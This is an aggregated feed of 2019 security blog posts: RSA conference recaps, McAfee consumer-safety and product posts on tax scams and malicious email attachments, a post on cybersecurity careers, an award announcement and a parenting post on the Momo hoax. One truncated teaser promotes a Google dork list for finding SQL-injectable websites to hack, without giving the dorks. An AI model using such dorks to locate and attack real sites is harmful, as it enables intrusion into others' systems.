At Veracode, our focus is on DevSecOps, which is bringing security into the automation fold of DevOps. When I saw that SaltStack focuses on SecOps, I was intrigued. This company is about bringing Security and IT Operations closer together in a far more automated fashion. With their platform, security teams can scan their networks for a number of different issues. In most cases, security teams would then send these findings to the Operations team to go and fix – essentially throwing the issue over the wall, which is exactly what DevOps itself aimed to solve in the Developer/Operations world. With SaltStack, security teams can create scripts that actually fix the issues, and send those over to the Operations group – who can then read the problem and fix in their language, and with a single click, deploy the fix immediately. The end goal is to eliminate the operations review cycles, and fully automate the scan and fix process, as the teams become more aligned over time. Any time companies can provide tools that help bridge the gaps between departments, it’s a big win. SaltStack is another company to check out and keep an eye on!

Cofense

https://cofense.com/

Have you heard of the company Cofense? How about PhishMe? If you’re like a lot of people I spoke to, they have heard about PhishMe, but not Cofense. Well, they’re the same company! About a year ago, PhishMe rebranded as Cofense after an acquisition by a private equity consortium. The main reason for the rebranding is because a lot of people knew about PhishMe for their phishing platform, but didn’t realize they provide much more beyond that. They maintained the name “PhishMe” as one of their products, but Cofense now represents the entire portfolio of products and services, including phishing reporting, threat intelligence, and incident response platform. Although the rebranding happened a year ago, I thought it would be good to mention Cofense in this list as a company to keep an eye on. Phishing is a problem that still takes even the most security-conscious company by surprise, and Cofense is on a mission to fix that problem.

Code42

https://www.code42.com/

I’m going to round out this list with Code42 for one simple reason – they nailed their marketing. I had never heard of Code42 before the conference because my career hasn’t taken me into the data loss prevention space. However, Code42’s digital and print advertising leading up to RSA was very memorable. They had a lot of fun with it, with phrases like “I love my DLP, said nobody ever.” I remember seeing a lot of these ads online leading up to RSA, and when I saw the same images at the booth as I was walking by, I had to stop in and say hello.  

Stay tuned for more from RSA …

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

In a software-driven world, who is responsible for the risks?

The power of software to improve our lives and our world is almost limitless. Consequently, those creating software are wielding a power that demands a new level of responsibility.

When I think about how fast the world is changing, I wonder how our ancestors must have felt at the dawn of past industrial revolutions. Everything changed – the way we made, shipped, and sold goods evolved, and daily schedules and lives changed as people moved to cities to escape subsistence farming and find work in factories and mills. All of this change was fueled by new technologies and innovations. While many of these changes were positive, there were risks and costs, such as increased injuries, rising wealth inequality, and, as urbanization took hold, an increased spread of disease. It became the responsibility of factory workers, and in some cases the government, to address these concerns in order for our economy and society to flourish and grow.

We are in the dawn of the fourth industrial revolution, where software will not only power our lives, but is also created by organizations to change the world in remarkable and sometimes unimaginable ways. We are already seeing innovations in software to solve some of modern society’s biggest challenges. There is software to help farmers determine the exact amount of water to use to hydrate their fields, so they don’t waste such a precious commodity. There is software to help diagnose disease, monitor vital health information, and even treat diseases.

This software is not just powering our world, it’s changing our world. Thus, those who create software have an increased level of power in our society – and as the Spiderman comics say, “with great power comes great responsibility.”  

Consider that the average car today has approximately 100 million lines of code. A good portion of this code goes into operating innovations that make the car more automated. The ethical implications of creating this code for vehicles is much more complex. For example, developers creating code for a self-driving car must consider how the technology will respond if the car is placed in a situation where it has to choose between hitting another car, or, worse, a pedestrian or biker. There is no right answer, and typically the driver would make this split decision based on instinct, reaction time, and cultural priorities. However, when a computer makes the decision, we are really asking the developer to decide, placing more responsibility with the developer.

As software becomes more ingrained into our lives, we are placing an increased responsibility on the shoulders of developers to make sure that software is functional and safe – both safe in terms of how it operates, but also how secure it is. In a world where software is used to treat patients, and solve important human issues, a breach in the digital world can have a tragic effect on the physical world. What a great responsibility developers have to code securely. We are putting our trust in their typing hands – trust that they will create great code, and that they will create code that does no harm, and doesn’t allow bad actors to use that software to harm. I’m not sure that’s what most programmers were signing up for when they decided to take that first computer science course. But it’s our current reality, and ultimately it’s the responsibility of all who interact with software – whether purchasing, using, or coding – to insist that quality software = secure software.

PCI DSS: Looking Ahead to Version 4.0


PCI SSC has begun efforts on PCI Data Security Standard version 4.0 (PCI DSS v4.0). Here we provide more insight into the development process and how PCI SSC is looking at changing the standard to support businesses around the world in their efforts to safeguard payment card data before, during and after a purchase is made.

McAfee Employees Strike Their #BalanceForBetter Pose This International Women’s Day

By Karla, Digital Media Specialist

During the month of March, we are thrilled to support International Women’s Day, on March 8, and Women’s History Month. At McAfee, we recognize the importance of an inclusive and diverse culture and as part of this year’s International Women’s Day call to action, we’ve asked team members from across the globe to share how they #BalanceForBetter at McAfee.

Check out some of these great moments and be sure to share your own #BalanceForBetter stories in the comments below!

 

Silvia – Software Sales Account Representative (Chile)

“I always wanted to work for a company that would support me in my role as a woman, a mother, a professional and an athlete. I found that place. McAfee allows me to be me and encourages me to do what I need to do to #BalanceForBetter.”

 

 

 

Priya – Customer Success Manager (India)

“At McAfee, I feel like I can grow my career and be an independent career-focused woman while still being a doting and caring mother and spouse. McAfee helped create the right balance between my family, future and career. #BalanceForBetter”

 

 

 

 

Steve – Head of Advanced Threat Research (U.S.)

“I wish I could say we had gender balance in Advanced Threat Research of 50/50 men and women. I wish we could say this at the industry level in general. However, there’s no time better than the present to change this.

What #BalanceForBetter means to me is engaging early by hosting lab days at McAfee or visiting schools. At McAfee, we have a chance to spark interest, demonstrate inclusiveness and promote real change in the gender gap across the IT industry. Without more women in tech, I truly feel like we are missing out on a unique and diverse perspective. As a father of two young girls with the potential to be anything, I know it’s time we change the status quo.”

 

 

Gurjeet – Engineering Manager (Canada)

“McAfee is like my second family. We celebrate each other’s achievements, encourage one another to give our best and are wonderful friends who always cheer each other up during difficult times.

Here, I can be my personal best every day at the office while doing all the things I cherish with my real family, like hiking, running, traveling and exploring the beautiful world.”

 

 

Paula – Head of Consumer ORD (Brazil)

“The consumer online business is a heavily results-driven organization that demands strong planning and speedy execution, so every minute counts! I #BalanceForBetter by creating clear business objectives that help me to prioritize my tasks and meetings – guaranteeing my weekdays are as productive as possible. This balance ensures that my mornings are spent in the gym and my evenings with family and friends, which ultimately gives me the energy and joy needed to execute my work each day.”

 

 

Laura – Marketing Communications Manager (Mexico)

“After working in marketing for more than 20 years in tech, I certainly believe that technology helps you find a balance of work and play – not having to choose between one or the other. I #BalanceForBetter at McAfee to define the best version of myself.”

 

 

 

Charan Jeet – MSSP Solutions Architect (Australia)

“McAfee’s flexible and supportive work culture plays a vital role. It encourages equal opportunity to every individual/employee irrespective of gender or background. It has helped me keep myself actively engaged in the activities I love, helping me #BalanceForBetter.”

 

 

 

Sonia – Talent Acquisition Partner (Argentina)

“We all live in the same world, but each person lives and experiences life through a different lens. Learning how to accept and sympathize with these different points of view is what makes the world a better place. As a recruiter, I enjoy communicating with diverse people to help them reach their full potential in all aspects of their work lives and personal lives. #BalanceForBetter”

 

 

 

Laura – Program Manager (Ireland)

“At McAfee, we are tipping the scales in terms of championing equality in the workplace. From our investment in gender pay parity to living the McAfee values and creating a better workplace where we are encouraged to be our full authentic selves. For me, that’s #BalanceforBetter.”

 

 

 

 

Andrea – Program Manager (Argentina)

“At McAfee, I #BalanceForBetter by leveraging my skills as a Program Manager to collaborate with teams around the globe. As a working mom at McAfee, I am offered a great work-life balance and I can #BalanceForBetter by devoting time to another one of my passions – playing soccer with my boys! This healthy mix helps me stay happy and well.”

 

 

 

McAfee is an inclusive employer and is proud to support inclusion and diversity. Interested in joining our teams? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

 

The post McAfee Employees Strike Their #BalanceForBetter Pose This International Women’s Day appeared first on McAfee Blogs.

Live From RSA: Opening Keynote Inspires

The keynote presentation this year at RSA carried three major themes: Better Together, Trust, and Artificial Intelligence.

Better Together

We were treated with a surprise keynote opening by Dame Helen Mirren, who gave an inspirational speech on the influence that every security practitioner in the room has on the security of our world. She walked us through an exercise, asking everyone to hold up their favorite picture on their phone, and share it with the people sitting nearby, to remind us all we are humans. 

It’s important in trying times, when we are all working hard every day to combat the cyberattacks against our nation, our companies, and our people to remember that we are all humans doing our best. When things are hard, it’s okay to look to your left and your right, and share in a positive experience with a neighbor. None of us can protect our world without each other. 

“We can build a better future together.” – Dame Helen Mirren

Trust

Next Rohit Ghai and Niloofar Razi Howe treated us to a visionary walk through the future, painting a picture of the year 2049 when the world is in the middle of a new era: the Biodigital Era. The main takeaway was that the security landscape is rapidly changing, and moving away from just understanding risk and attacks, and towards a world where trust is the most important thing. 

They painted a picture of a future where people lost faith in democracy, in media and news, and in the companies they had loved for so many years. We were brought back to the current year, 2019, where over 40K attendees at RSA made the conscious decision to work toward fixing the trust landscape so that the vision of an untrusting world of 2049 does not come to reality. 

They challenged everyone to get there by working toward three visionary objectives:

1) Consider both risk and trust together: Risk and trust coexist, and you have to understand, prioritize, and manage your risk so you can continue to keep trust.

2) Embrace the machine/human relationship: The trustworthy twins are here, meaning that humans and machines together are more trustworthy than either individually. As an industry, we should work to continue embracing this relationship, because our adversaries are working towards this. 

3) Build a chain of trust by measuring your reputation to measure your trustworthiness. There is a connection between the reputation of your business and its trustworthiness, and we need to ensure that we make “deposits” to our global reputation account by celebrating successes and sharing knowledge between companies. Too often, we make “withdrawals” when things go wrong, but don’t spend enough time working with others, even our competitors, to understand the attackers and threats that work to taint our reputations.

Artificial Intelligence

The last common theme was around AI, which resonated through all the presentations during the keynotes. AI is important to the success of our companies moving forward, and we must embrace this change. Our adversaries leverage machine learning and artificial intelligence to prioritize their attack vectors toward the weakest points uncovered by these algorithms. However, AI has limitations that still require human partnership, which we were reminded of during a story about the Cold War era. The Soviets “detected” the US launching five missiles towards them, but one man decided to ignore the “by the book” protocol and dismiss it as a false positive (which was correct), rather than escalating us into World War 3.

Adversaries are working on a number of fronts to combat the work that security companies do leveraging AI, including things like tainting machine learning classifiers in order to throw off the detection of their attacks. 

Wrapping Up

It’s amazing being at a conference of over 40K people who are all working toward the same goals: to protect our customers, our data, our country, and our people. There is an incredible honor and pride in this work and a sometimes overwhelming challenge when the targets are moving. It’s important for all of us to continue to understand how the threats are changing and stay laser focused on the needs of companies to combat those threats. Veracode works every day toward these goals, with a heavy focus on ensuring that our customers can trust the results of the security tests we give them. For us, trust is important, and the world shifting towards a focus on trust is critical to the success of our security practices.

Stay tuned for more from RSA …

Why it’s too easy to manipulate voters – and steal the EU elections | Eleonora Nestola

It’s time to act, as personal data is being used to target voters – and the EU commission isn’t doing enough to stop this

On 11 July last year the UK Information Commissioner’s Office (ICO) published its first report on the Cambridge Analytica scandal. This is a date I will never forget, a date that substantially changed my vision of the current threats to our democratic society. It is a day that became a call to arms for me – and, for once, I had the understanding, the knowledge and the expertise to support the fight. I felt it was time to put all of this to good use for civil society, and so I set out to discover how online electoral campaigning works. And let me tell you, the system is not in good health and we Europeans should all be made more aware of that.

Related: This is Europe: stay close with the Guardian’s email updates

Voters become unaware they are receiving political messages based on bias. The risks are enormous

Related: Data protection laws are shining a needed light on a secretive industry | Bruce Schneier

Continue reading...

Huawei’s possible lawsuit, ransomware readiness, old malware resurfaces | TECH(feed)

The ongoing battle between the U.S. and Huawei could soon go to court as Huawei reportedly prepares to sue the U.S. government. Plus, 2019 will see ride sharing companies going public… but which will be first? And as a decade-old malware resurfaces in enterprise networks, a report questions if the world is ready for the next large-scale ransomware attack.

Live From RSA: DevSecOps Days

RSA is arguably the preeminent security conference of the year. 2019 looks to live up to the excitement with a schedule full of knowledge sharing from the top experts in our industry. All week, we will share what we are learning this year, on both our social media channels and our blog. 

Monday was full of pre-conference seminars and sessions to attend, and the one that caught our eye was DevSecOps Days. Our very own Tim Jarret, Director of Product Management, attended this day-long seminar and has a few takeaways to share with you. 

DevSecOps is here, just not evenly distributed

DevOps alone still largely remains an aspirational goal for companies looking to accelerate their development schedules, drive predictability, and pivot quickly to new market demands. The theory of DevOps is fantastic, but the practice isn’t as straightforward. It makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. 

Tim says that, “A lot of practitioners talked about the ideals of DevSecOps but acknowledge that there are still a lot of challenges. Some attendees are still struggling with the DevOps transformation alone (including how to make traditional infrastructure teams ‘agile’), so DevSecOps is a challenge atop a challenge."

The biggest hurdles facing DevSecOps may be organizational and psychological rather than technological

There is little dispute that the ability to implement DevSecOps from a technology perspective is possible, and some companies have found success in doing so. However, technology remains an easy escape for blame when the real problems are with the people. Technology enables DevOps and DevSecOps, but it’s people, processes, and culture that drive it forward. So all the technology in the world will not help a company if they do not have the capabilities and drive to execute a DevSecOps strategy. It’s also why companies are looking for vendors to not just provide them with a “shiny tool” but give them a full programmatic approach to DevSecOps.

One moment stood out to Tim – “One panelist talked about the challenge of getting security practitioners to agree to implement feedback loops around incidents as an example of a simple mind shift. A danger is that security continues to see itself outside processes and therefore abdicates power where it could have an opportunity to drive change.”

Our recommendation to security leaders: be an enabling body who’s mission is to help drive development forward. Lead with stories about how your developers must deal with the backlog work, in the form of security issues, that will slow down development later or, worse, force them to drop everything when a breach occurs. 

To succeed with DevSecOps, security must recast what it does in terms of business value delivery

Our previous recommendation drives right into the third takeaway from DevSecOps Days. Security is often seen as a blocker to getting work done – the annoying person over your shoulder preventing your code from moving forward. This does not have to be the case, and security should be champions for efficient and high-velocity development. 

Tim’s thoughts on this? “It’s hard to prioritize security activities that avoid risk against projects that deliver business value. Security needs to define its work as helping to deliver business value faster or more safely rather than standing outside the process.”

We recommend that your security team sets a goal for itself: In the next 12 months, someone on your team will deliver a presentation, webinar, or speaking engagement on how you helped increase the overall velocity of your development teams. Make that a real driving goal for your team and ask yourself if the processes and controls put in place are driving your team towards that goal.

Stay tuned for more from RSA …

Let’s Discuss Cybersecurity as a Career Option This International Women’s Day

Even as I write this blog, the higher secondary board exams have started in schools across India and I send up a silent prayer for the thousands of nervous youngsters who are at the juxtaposition of a crucial time in their lives – the time when they have to take serious decisions regarding college education and career. The Board results would no doubt play a major role in this decision making.

With International Women’s Day around the corner, I am naturally thinking about women, their emancipation and their choices in life. I imagine them thinking independently, making decisions based on their capabilities and preferences, and supplying the necessary valuable skills that our country so needs.

But often that isn’t the case for teens as they are indecisive, and their knowledge of professions isn’t vast. They often miss out on plum prospects because, well, they were not aware of them or feel they may later hamper their family lives! I am going to do my bit for all the young ladies finishing school education this year- I am going to talk to you about choosing cybersecurity as a career option.

So girls, if you possess good reasoning power, enjoy ferreting out the source of the problem, are a natural at coding or are a serious video gamer, think cybersecurity.

Why Cybersecurity you ask? Let me present the facts.

  • Skills shortage

The National Association of Software and Services Companies (NASSCOM) recently estimated that India alone will need 1 million cybersecurity professionals by 2020 to meet the demands of its rapidly growing economy.

Demand for security professionals in India will increase in all sectors due to the unprecedented rise in the number of cyber-attacks, added NASSCOM. Despite having the largest information technology talent pool in the world, India is struggling to produce an adequate number of professionals to close the cybersecurity skill gap.

  • The age of diversification

There is gender gap in the cybersecurity sector and companies globally are trying to correct this, not just to promote diversity but to add value to their work culture with the addition of the visions, perspectives and skills that women bring in.

  • Flexible work arrangements

With more women joining the profession, employers are doing their best to make the work atmosphere favourable for them. Not only are they offering flexi-timings but also work-from-home opportunities when it’s possible. I have heard of companies that allow mothers with infants to work from home for extended periods! Isn’t that a blessing?

According to a 2013 McKinsey Report, 34 percent of India’s IT workforce is female. However, most of them exit the employment pipeline at the junior to mid-level.

This only goes to reveal that many women scientists and engineers drop out, perhaps because they find it difficult manage their work-home balance. With flexi-timings and work-from-home options, this figure will definitely decrease!

  • Good support system

Great news for all women exploring cybersecurity as a career! There are organizations like Women in CyberSecurity (WiCyS) that aims at offering a common platform to women cybersecurity professionals from academia, research and industry where they can network, mentor and be mentored, share information and experience; which means, you will never feel alone as help is just a click away!

  • You don’t need to be an engineer

Employers are trying to plug the cybersecurity skills gap with alternative solutions. It has been found that video gamers too have the right types of skills along with a different approach to threat hunting. So, if you are an avid gamer, go for it!

  • Steady jobs with good pay

This last bit is the clincher really! In this super-competitive market, isn’t it a dream to have a high salary job that rarely gets monotonous?

McAfee lists some cool cybersecurity job prospects for you, check them out!

Job 1 – Forensics Expert

They analyze and determine who the mastermind behind a security breach might be. It can be almost as complex and precise as understanding human DNA.

Job 2  – Cryptographer/ Cryptanalysts

Cryptographers develop algorithms, ciphers and security systems to encrypt and hide sensitive information from cyber hackers.

Job 3 – Threat Hunter

Threat hunters use manual or machine-assisted skills to detect and prepare for security incidents

Job 4 – Security Architect

They design systems to help develop and test the security vulnerabilities of a business

Parenting tips to rear future cyber security experts:

You can help your child make faster career decisions if you instill security habits in them from an early age. It goes without saying that you need to model cybersecurity habits so that they can learn by imitating you. Discuss cybersecurity as a profession and explore the prospects together online. Take your child to meet friends in the field so that they can get their doubts cleared. Have dinner time conversations on how attacks are becoming more advanced and the best means to fight them. If your daughter enjoys playing online games, use that as a conversation starter to talk about how security firms are looking at video gamers—even those without a background in cybersecurity.

The best gift you can give the women in your family on International Women’s Day is a sense of independence, security and equality.

Happy International Women’s Day!!

Credits:

https://anitab.org/blog/indian-women-in-technology-barriers/

CSO

McAfee

The post Let’s Discuss Cybersecurity as a Career Option This International Women’s Day appeared first on McAfee Blogs.

What is an IT auditor? A vital role for risk assessment

What is an IT auditor?

An IT auditor is responsible for analyzing and assessing a company’s technological infrastructure to ensure processes and systems run accurately and efficiently, while remaining secure and meeting compliance regulations. An IT auditor also identifies any IT issues that fall under the audit, specifically those related to security and risk management. If issues are identified, IT auditors are responsible for communicating their findings to others in the organization and offering solutions to improve or change processes and systems to ensure security and compliance.

Cloudbric Wins “Hot Company Website Security” at the InfoSec Awards 2019

On March 4, Cyber Defense Magazine announced the winners of 7th Annual Coveted Information Security Awards during the RSA Conference 2019. Cloudbric was selected as a recipient of the Hot Company selection for Website Security.

Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine has spent the past six months scouring the globe and found nearly 3,000 companies who create and offer the most respected information security products and services.

Cloudbric was honored for their Website Security, which boasts an award-winning WAF, DDoS Protection, and SSL as a full service package for small and medium-sized businesses who are looking for a more proactive solution to emerging cyber threats. 

“We’re thrilled to have won the Hot Company award from Cyber Defense Magazine as a recognition of our website security services. Cloudbric aims to proudly emerge as a household name within the website security industry and hope to lead the way for SMB security,” said TJ Jung, Chief Executive Officer of Cloudbric.

“While nation state exploitation, Cybercrime, Hacktivism, Cyberespionage, Ransomware and malware exploits are all on the rise, Cloudbric has won the Hot Company Website Security InfoSec Award from our magazine. They won after we reviewed nearly 3,000 infosec companies, globally, because they are an innovator on a mission to help stop breaches and get one step ahead of these threats, proactively,” said Gary S. Miliefsky, Publisher, Cyber Defense Magazine.

The full list of winners can be found at www.cyberdefenseawards.com.

cloudbric infosec awards 2019 hot company website securityAbout CDM InfoSec Awards

This is Cyber Defense Magazine’s seventh year of honoring InfoSec innovators. Submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com.

About the Judging

The judges are CISSP, FMDHS, CEH, certified security professionals who voted based on their independent review of the company submitted materials on the website of each submission including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy to find more innovative players with new and unique technologies, than the one with the most customers or money in the bank. CDM is always asking “What’s Next?” when looking for Next Generation InfoSec Solutions.

About Cyber Defense Magazine

With over 1.4 Million annual readers and growing, and over 7,000 pages of searchable online infosec content, Cyber Defense Magazine is the premier source of IT Security information. They are managed and published by and for ethical, honest, passionate information security professionals. Their mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and limited print editions exclusively for the RSA conferences and paid subscribers. CDM is a proud member of the Cyber Defense Media Group. Learn more at www.cyberdefensemagazine.com and visit www.cyberdefensetv.com and www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.

The post Cloudbric Wins “Hot Company Website Security” at the InfoSec Awards 2019 appeared first on Cloudbric.

Google Dorks List 2019 SQLi Dorks – HackingVision

Google Dorks List 2019 SQLi Dorks Google Dorks List 2019, Google Dorks List, Find SQL Injectable Websites, Hack Websites using Google Dorks, Google Dorks List SQL Injection. Google Dorks List 2019 is a list of dorks to find SQL injectable websites. A Google dork query, sometimes just referred to as a dork, is a search […]

The post Google Dorks List 2019 SQLi Dorks – HackingVision appeared first on HackingVision.

McAfee Protects Against Suspicious Email Attachments

Email remains a top vector for attackers.  Over the years, defenses have evolved, and policy-based protections have become standard for email clients such as Microsoft Outlook and Microsoft Mail.  Such policies are highly effective, but only if they are maintained as attacker’s keep changing their tactics to evade defenses.  For this reason, McAfee endpoint products use a combination of product features and content for increased agility.  In McAfee Endpoint Security (ENS) 10.5+, such protection is enabled via the ‘Detect suspicious email attachments’ option and maintained through DAT content.  This capability goes beyond the level of protection offered by email clients by not only blocking applications and scripts, but also a variety of threat types in their native form, as well as those compressed and contained within archives and other formats.

Figure 1 – ENS 10.6.1 Configuration Screen

An example of this capability in action can be seen against a recent spam run.

In this campaign, a malicious email message contained the attachment BANK DETAILS.ZIP.  Inside this archive was the file BANK DETAILS.ISO.  Malicious ISO spam has been increasing over the past six months, and while it is common for ISO files to be blocked by email clients, this is not the case where the ISO is inside of a ZIP.  Inside the BANK DETAILS.ISO file resides BANK DETAILS.EXE.  Email clients will typically block executable files attached to messages, but not if they are inside a container.

When the email client attempts to write the attachment to disk, ENS scans inside the ZIP and subsequently the contained ISO and EXE files (ZIP -> ISO -> EXE).

Figure 2 – ENS Toaster Popup

In this case, 2-year-old DAT content proactively stopped the threat.

If the system had not been protected, an unsuspecting user might open the ZIP to reveal the ISO.

Figure 3 – Inside ZIP file showing ISO file

The ISO can then be accessed via Windows Explorer, which appears as a DVD Drive containing the executable, password-stealing, payload.

Figure 4 – EXE file inside Bank Details.ISO

Since the advent of policy-based email attachment blocking, attackers have continued to seek ways to evade that protection. ISO abuse may be the latest chapter in the story, but others are sure to follow.

Tens of thousands of new and unique malicious attachments are blocked each month via the ‘Suspicious Attachment’ detection feature.

The post McAfee Protects Against Suspicious Email Attachments appeared first on McAfee Blogs.

Weekly Update 128

Weekly Update 128

I'm not intentionally pushing these out later than usual, but events have just been such over the last few weeks that it's worked out that way. This one really is a short one though as there hasn't been a lot of newsworthy stuff going on this week, other than the new Instamics I picked up which are rather cool. The audio recording did work well (I mentioned in the video I wasn't sure if it was functioning correctly), and it's pretty damn good quality for what it is. Certainly better than my old Rhode lapel mic, but obviously not up to the standard of the Electro-Voice I use for professional recording.

Next week I expect I'll be a little more organised and have some more content but until then, here's a succinct 14 minutes worth of what's new on my side:

Weekly Update 128
Weekly Update 128
Weekly Update 128

References

  1. I bought some Instamics (these are very cool units, but the firmware update process is worrying)
  2. We've got a free NDC meetup in Melbourne soon (Brisbane sold out early and Melbourne looks like doing the same)
  3. We're bringing NDC to New York! (I'll be there doing a workshops and talks)
  4. I loaded the Dubsmash data breach into HIBP (also just pushed the button on ShareThis)
  5. Varonis is sponsoring my blog this week (more from them on their DFIR team investigating a cyberattack)

25 Free eBooks to learn Python 2019 – HackingVision

Free eBooks list of free Python programming eBooks to learn Python programming. Download eBooks in PDF EPUB 2019 Python eBooks. List curated by Hackingvision.com Disclaimer: The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your […]

The post 25 Free eBooks to learn Python 2019 – HackingVision appeared first on HackingVision.

Alleged ‘Momo Challenge’ Reminds Parents to Monitor Online Content

Momo challenge
This eerie image is connected to the alleged Momo challenge causing panic among parents.

Editor’s Note: This blog post includes disturbing content and mentions of suicide.

Internet challenges have been going on for years. They can be fun and harmless, or they can be dim-witted and even deadly. The latest challenge referred to as the Momo challenge seemingly hits a whole new level of creepy but experts say there’s little evidence the challenge is real.

What Is It?

To participate in the alleged challenge players using various apps or games are purportedly urged by a pop-up image of “Momo” to hurt themselves or others to avoid being cursed by the creature. (The creepy image of Momo is reportedly a half-girl-half-bird sculpture created by a Japanese artist unrelated to the game). Rumors allege the game ends with Momo encouraging participants to take their own lives and record it for social media.

Real or rumor?

Is the challenge real or a hoax? While several youth suicides around the world are rumored to be tied to the Momo game, none of the connections have been proven, according to both the Washington Post, Snopes, and other news sources.

Rumored or reality, one thing is for certain: The viral Momo story is creating a genuine panic and perceived threat among parents that requires an equally strategic response.

With devices in the hands of most kids by the time they are 10, the viral Momo challenge offers all of us a chance to stop, think, and connect with our kids specifically about digital content, peer pressure, and the danger of online challenges.

Talking Points for Families

Be hands-on. This story, while considered an internet myth, represents an opportunity to get even more hands-on with your digital parenting efforts. As silly, viral challenges like Momo arise (and there will be more), resolve to routinely monitor the content your kids engage with online. This includes apps, YouTube content, video games, TV shows online, and chat apps. Feel overwhelmed with monitoring? Consider getting a software program to be your eyes and ears online and help filter out risky content.

Get proactive. Depending on the age of your child, chances are if they’ve heard about the Momo game or seen the image, they could be frightened. Talk about the dangers of peer pressure, bullying, and online challenges. Make sure the conversation is two-way and includes your child’s experiences and thoughts on the topic. Ask your child to come to you immediately if anyone or anything online ever makes them feel unsafe, afraid, or provoked.

Stay informed. Risky digital behaviors that affect kids, tweens, and teens make the headlines each week. Any parent in the know will tell you candidly that staying informed about online risk is a part-time job attached to parenting. Read blogs, set google alerts, listen to podcasts, and connect with experts online to stay informed. Other dangerous online challenges include the Bird Box Challenge and several others.

Encourage critical thinking. If your child blows off the potential seriousness of online stunts or games, encourage him or her to think a behavior through. Ask them: “Walk through each step of the stunt and tell me where you think things could go wrong.” This will help your child personally determine if an activity is risky or not.

Know Those Apps! One of the biggest threats to a child’s online safety is his or her choice in apps. Apps run the gamut of risk and range from educational and uplifting to inappropriate and dangerous. Go on your child’s phone regularly and check for risky apps. Google the app and read app reviews. Look at age restrictions and customer reviews so you will be better equipped to evaluate whether an app may be suitable for your child. Dangerous apps include Kik Messenger, Ask.Fm, Tumblr, and any other social network that allows anonymous users.

Monitor online communities. Your kids have friends they bring home, but they also have friends online you will never meet face to face. Dig in and get curious. Look for apps such as WhatsApp or Kik that allow kids to chat with anyone, anywhere. Ask your kids to show you where they spend their time and the kind of people they choose to talk with. Remember: The direct message feature on favorite apps like Instagram and Snapchat are also ways kids connect with peers online.

